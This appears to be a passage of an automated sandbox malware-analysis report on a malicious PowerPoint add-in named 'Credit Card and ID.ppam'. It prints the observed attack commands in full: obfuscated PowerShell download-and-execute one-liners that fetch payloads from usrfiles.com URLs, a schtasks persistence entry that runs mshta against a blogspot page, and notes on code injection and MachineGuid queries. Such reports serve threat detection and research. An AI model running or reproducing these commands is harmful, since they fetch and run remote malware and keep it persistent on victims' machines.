Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a6990275
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\Credit Card and ID.ppam
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 63 /tn ""kqopaueyu"" /F /tr ""\""MsHtA""\""https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html\"
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\MsHtA.EXE "https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html"
Source: taskeng.exe, 0000000F.00000002.671893460.00000000007F0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: taskeng.exe, 0000000F.00000002.671893460.00000000007F0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: taskeng.exe, 0000000F.00000002.671893460.00000000007F0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid